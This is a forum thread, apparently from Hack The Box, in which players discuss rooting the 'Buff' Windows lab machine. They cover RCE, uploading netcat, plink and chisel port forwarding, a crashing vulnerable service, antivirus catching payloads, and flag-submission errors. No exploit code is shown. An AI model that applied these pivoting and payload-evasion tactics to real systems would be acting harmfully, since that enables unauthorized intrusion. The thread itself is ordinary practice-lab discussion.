I think I'm misunderstanding what is meant by portforwarding in this instance. I assumed I'd need to be able to open up a port on a router to allow connections from the internet. Is there a way to do this with SSH tunnels?
Yes - there are lots of ways to do port forwarding but it isn't down to the router in this context.
It allows you to use the shell you have to let you pivot to internal systems
And I've uploaded nc by modifying the script to read nc64.exe and send that instead. I believe it's worked but there's no way to verify as far as I can tell.
If you've modified the script to read nc64.exe, you might have broken it. The script - as written - creates a file on the fly, so your upload will actually be some hex and then a PHP command.
You need to use the RCE to upload any files you want, rather than trying to modify the RCE.
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
@TazWake Thanks, yes. RCE of course. I am trying to move over to a proper shell, that fails (files are copied). Will check if that host works better while switching my VPN back to UDP, couple of other issues I had where solved switching the HTB VPN to TCP
I hate this box, I wasted so much time enumerating and it's all just a mess. I see multiple exploits, lots of pages with lots of errors and terrible hints. I don't know what the deal is.
Ha just realized what I overlooked immediately after posting this.
Hi all. I have tested the software of the exe i found on the system on my own windows system and can get a reverse shell from it with the converted script. but once i run it on buff itself i get the following error AttributeError: module 'sys' has no attribute 'exc_value". so that didnt look important and i removed it and tested it on my local windows box and it worked fine. but on buff which is also the same windows architecture and version doesnt work. i have tried 5 times. i am sure i have the right exploit because it also listens on the same port.
Hi all. I have tested the software of the exe i found on the system on my own windows system and can get a reverse shell from it with the converted script.
IMHO it is a lot easier to set up port forwarding and run the exploit on your machine rather than try to get a compiled executable to work in the buff environment.
but once i run it on buff itself i get the following error AttributeError: module 'sys' has no attribute 'exc_value". so that didnt look important and i removed it and tested it on my local windows box and it worked fine. but on buff which is also the same windows architecture and version doesnt work.
That seems to imply it was important or the script is wrong.
i have tried 5 times. i am sure i have the right exploit because it also listens on the same port.
There are lots of exploits which listen on this port. Double-check your assumptions if it isn't working. Maybe even try other ones.
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
i was trying this exact method now. i have a port forward to the port and running the script locally. i have changed the port in the script to point to my local port that is connected to the port forward on buff. doesnt seem to work. i will try play around with it. i am using a standard port forward from buff using p****.*** to my system which works fine.
seems the service is no longer running. i guess i have to revert.
This service is never up. does it ever restart on its own again?
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
@TazWake Thanks for all the help. i think i will try a different box as this service doesnt seem to come back up much. maybe i should just pay for a subscription again to get access to different versions of the VM with less people on it.
I dont no if im in rabbit hole for root, clxxxxx.exx is the way to go? because i tried different exploits but none of them work. And yes i foward the ports using pxxxx.exx. Any nudge please im stuck
Pretty cool box with easy user. However, I had really hard times with getting root, just because the vulnerable service was constantly crashing...
Besides, I found windows boxes way more unstable than linux.
I dont no if im in rabbit hole for root, clxxxxx.exx is the way to go? because i tried different exploits but none of them work. And yes i foward the ports using pxxxx.exx. Any nudge please im stuck
If you read the post above yours you can see that other people are having similar issues.
You are on the right path. If it doesn't work, you need to narrow down the reason why it hasn't worked:
You've used the wrong exploit
You've configured the exploit incorrectly
The port forward didn't work
The service might be broken by other people launching random attacks against it
There might be service instability from people randomly trying to start the service themselves
Being able to troubleshoot an attack is a great skill to develop. Try not to let frustration cloud your analysis.
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
I think the machines user flag was the fastest I've ever got. The nmap scan lasted longer than that. It's a really nice entry level machine, it doesn't get more by-the-book than that.
The privesc gets cloudy, but when you actually read the exploit you'll see where it's going. I was stuck for a few hours on "Connection Refused", then I read a similar trouble googling it and all I had to do was to download the newest version of the p****.**e on their website and the whole privesc attack worked.
The AV catches litteraly everything i have dropped on this box. Any Msfvenom payload; nc.exe; nc64.exe; powershell one-liners, even edited with different variable names...
The AV catches litteraly everything i have dropped on this box. Any Msfvenom payload; nc.exe; nc64.exe; powershell one-liners, even edited with different variable names...
Double-check this. I didn't realise any AV was running.
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
It's very unusual for a server to have less than 50% root flags compared to users. Now i get it... i've tried 4 or 5 versions of the exploit, specifically the one clearly mentionned as "tested on Win10 x64"... i have never even been able to get even a simple "ping -n 1" back. And yes, my port-fw works fine, both with p*** and chi***
As to the AV, funnily it catches netcat that you find on the web but it doesn't catch the one included in Kali.
Terrible box. I had a go at this around its release date and could not make any progress due to other people crashing the exploitable service all the time. Decided to come back to it later when there were less people on it, and discovered it doesn't really matter - the service in question crashes repeatedly on its own - being able to exploit it is literally just a matter of dumb luck.
Complete waste of time, do not even bother with this box, it is trash.
Terrible box. I had a go at this around its release date and could not make any progress due to other people crashing the exploitable service all the time. Decided to come back to it later when there were less people on it, and discovered it doesn't really matter - the service in question crashes repeatedly on its own - being able to exploit it is literally just a matter of dumb luck.
Complete waste of time, do not even bother with this box, it is trash.
I had so many problem with the service that i restarted the box... well, on a clean box, (and i'm on VIP), that localservice wasn't running any more at all ! I'm going it a last try now but will move on to other things if that doesn't work.
The privilege escalation path was really painful, I had to restart the box at least 5 times to get the exploit to work. Other than that fun box.
It's even more nasty than that, because the service automatically restart or at least appears under a different PID... i therefore assumed i didn't have to care about crashes... i was wrong and wasted hours.
I have user and am working on root. I found the C*. and the correct exploit for it however im having trouble with getting the p****.*** working right. Looking for some pointers if anyone is willing to help.
I can tell you what ive tried in DM, dont want to post all here.
Hello, I have an admin console in the system. However, when I go to deliver both flags, user and root, I always get an error. This happens to me in both the old and the new interface. Does it happen to anyone else? I left this machine behind a few days ago in case there was any user modifying the flags, today I tried again but I am unable to deliver the flags.
Hello, I have an admin console in the system. However, when I go to deliver both flags, user and root, I always get an error. This happens to me in both the old and the new interface. Does it happen to anyone else? I left this machine behind a few days ago in case there was any user modifying the flags, today I tried again but I am unable to deliver the flags.
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
Some help over here ... this is my second time that I saw the root.txt but when I try to validated it I have an error... 7ddCENSURED09 ...is this de correct flag for root or should I continue looking other Administrator Desktop root.txt file ? I did all with the PLINK -sh and run my exploit correctly sometimes it is cached others not ... but when I can keep the session open with root , I copy the Flag as faster that i can but it´s not working don the validator.
I´m not sure if this is and error because I validated my user flag 2 or 3 days ago.
Some help over here ... this is my second time that I saw the root.txt but when I try to validated it I have an error... 7ddCENSURED09 ...is this de correct flag for root or should I continue looking other Administrator Desktop root.txt file ? I did all with the PLINK -sh and run my exploit correctly sometimes it is cached others not ... but when I can keep the session open with root , I copy the Flag as faster that i can but it´s not working don the validator.
I´m not sure if this is and error because I validated my user flag 2 or 3 days ago.
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
Some help over here ... this is my second time that I saw the root.txt but when I try to validated it I have an error... 7ddCENSURED09 ...is this de correct flag for root or should I continue looking other Administrator Desktop root.txt file ? I did all with the PLINK -sh and run my exploit correctly sometimes it is cached others not ... but when I can keep the session open with root , I copy the Flag as faster that i can but it´s not working don the validator.
I´m not sure if this is and error because I validated my user flag 2 or 3 days ago.
Did you read the post immediately before yours?
heeey TazWake !! ... thanks bro currently It was rooted !!
I was worried because I was not sure if I was doing the correct for my first port forwarding with plink !!
heeey TazWake !! ... thanks bro currently It was rooted !!
I was worried because I was not sure if I was doing the correct for my first port forwarding with plink !!
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
Comments
@ChrisBrownie55 said:
Yes - there are lots of ways to do port forwarding but it isn't down to the router in this context.
It allows you to use the shell you have to let you pivot to internal systems
If you've modified the script to read nc64.exe, you might have broken it. The script - as written - creates a file on the fly, so your upload will actually be some hex and then a PHP command.
You need to use the RCE to upload any files you want, rather than trying to modify the RCE.
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
Edit: reset box. now it works with normal shell.
I hate this box, I wasted so much time enumerating and it's all just a mess. I see multiple exploits, lots of pages with lots of errors and terrible hints. I don't know what the deal is.
Ha just realized what I overlooked immediately after posting this.
Hi all. I have tested the software of the exe i found on the system on my own windows system and can get a reverse shell from it with the converted script. but once i run it on buff itself i get the following error AttributeError: module 'sys' has no attribute 'exc_value". so that didnt look important and i removed it and tested it on my local windows box and it worked fine. but on buff which is also the same windows architecture and version doesnt work. i have tried 5 times. i am sure i have the right exploit because it also listens on the same port.
@Parker said:
IMHO it is a lot easier to set up port forwarding and run the exploit on your machine rather than try to get a compiled executable to work in the buff environment.
That seems to imply it was important or the script is wrong.
There are lots of exploits which listen on this port. Double-check your assumptions if it isn't working. Maybe even try other ones.
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
i was trying this exact method now. i have a port forward to the port and running the script locally. i have changed the port in the script to point to my local port that is connected to the port forward on buff. doesnt seem to work. i will try play around with it. i am using a standard port forward from buff using p****.*** to my system which works fine.
seems the service is no longer running. i guess i have to revert.
This service is never up. does it ever restart on its own again?
@Parker said:
It should but people try lots of different exploits on it so it frequently crashes.
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
@TazWake Thanks for all the help. i think i will try a different box as this service doesnt seem to come back up much. maybe i should just pay for a subscription again to get access to different versions of the VM with less people on it.
I dont no if im in rabbit hole for root, clxxxxx.exx is the way to go? because i tried different exploits but none of them work. And yes i foward the ports using pxxxx.exx. Any nudge please im stuck
Pretty cool box with easy user. However, I had really hard times with getting root, just because the vulnerable service was constantly crashing...
Besides, I found windows boxes way more unstable than linux.
@amoraca11 said:
If you read the post above yours you can see that other people are having similar issues.
You are on the right path. If it doesn't work, you need to narrow down the reason why it hasn't worked:
Being able to troubleshoot an attack is a great skill to develop. Try not to let frustration cloud your analysis.
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
I think the machines user flag was the fastest I've ever got. The nmap scan lasted longer than that. It's a really nice entry level machine, it doesn't get more by-the-book than that.
The privesc gets cloudy, but when you actually read the exploit you'll see where it's going. I was stuck for a few hours on "Connection Refused", then I read a similar trouble googling it and all I had to do was to download the newest version of the p****.**e on their website and the whole privesc attack worked.
The AV catches litteraly everything i have dropped on this box. Any Msfvenom payload; nc.exe; nc64.exe; powershell one-liners, even edited with different variable names...
eCPPT | OSCP
@lebutter said:
Double-check this. I didn't realise any AV was running.
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
This is my first ever box, im struggling a little. can anyone PM me to offer some help.
thank you
It's very unusual for a server to have less than 50% root flags compared to users. Now i get it... i've tried 4 or 5 versions of the exploit, specifically the one clearly mentionned as "tested on Win10 x64"... i have never even been able to get even a simple "ping -n 1" back. And yes, my port-fw works fine, both with p*** and chi***
As to the AV, funnily it catches netcat that you find on the web but it doesn't catch the one included in Kali.
eCPPT | OSCP
Terrible box. I had a go at this around its release date and could not make any progress due to other people crashing the exploitable service all the time. Decided to come back to it later when there were less people on it, and discovered it doesn't really matter - the service in question crashes repeatedly on its own - being able to exploit it is literally just a matter of dumb luck.
Complete waste of time, do not even bother with this box, it is trash.
Type your comment> @shogunx said:
I had so many problem with the service that i restarted the box... well, on a clean box, (and i'm on VIP), that localservice wasn't running any more at all ! I'm going it a last try now but will move on to other things if that doesn't work.
eCPPT | OSCP
The privilege escalation path was really painful, I had to restart the box at least 5 times to get the exploit to work. Other than that fun box.
OSCP
Type your comment> @a1mops said:
It's even more nasty than that, because the service automatically restart or at least appears under a different PID... i therefore assumed i didn't have to care about crashes... i was wrong and wasted hours.
eCPPT | OSCP
I have user and am working on root. I found the C*. and the correct exploit for it however im having trouble with getting the p****.*** working right. Looking for some pointers if anyone is willing to help.
I can tell you what ive tried in DM, dont want to post all here.
Thanks Much!
Hello, I have an admin console in the system. However, when I go to deliver both flags, user and root, I always get an error. This happens to me in both the old and the new interface. Does it happen to anyone else? I left this machine behind a few days ago in case there was any user modifying the flags, today I tried again but I am unable to deliver the flags.
@Ominousk said:
If you read through a few of the threads here you will see that this is an occasional problem. (eg: https://forum.hackthebox.eu/discussion/comment/80181/#Comment_80181)
HTB uses dynamic hashes which means they change every time the box reboots or is on a different VPN.
However, it also means that sometimes the hashes don't load properly and it creates issues.
The main suggestions seem to be:
1) reboot, repeat the pwnage, get the new flags, try them
2) report it to HTB via a JIRA ticket and see if they can fix the issue
If you've left the machine for a few days, the flags you have are incorrect and you need to repwn.
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
Some help over here ... this is my second time that I saw the root.txt but when I try to validated it I have an error... 7ddCENSURED09 ...is this de correct flag for root or should I continue looking other Administrator Desktop root.txt file ? I did all with the PLINK -sh and run my exploit correctly sometimes it is cached others not ... but when I can keep the session open with root , I copy the Flag as faster that i can but it´s not working don the validator.
I´m not sure if this is and error because I validated my user flag 2 or 3 days ago.
@H4FN said:
Did you read the post immediately before yours?
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
Type your comment> @TazWake said:
heeey TazWake !! ... thanks bro currently It was rooted !!
I was worried because I was not sure if I was doing the correct for my first port forwarding with plink !!
@H4FN said:
Cool.
If you get the flag though, it worked.
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
Rooted!!!
ping me for any hints and tips
First time playing, got the user flag after failing to understand the difference between RCE and Shell, but managed it in the end.
Going for root now, but I'm pretty lost. I'm trying to enumerate everything I can find, but I feel I'm going down the rabbit hole here.
(Please, stop resetting the machine every 20minutes...)
Need a nudge getting root. After talking with a couple of others I believe I've utilized pl. correctly, I'm just not sure what to do after that.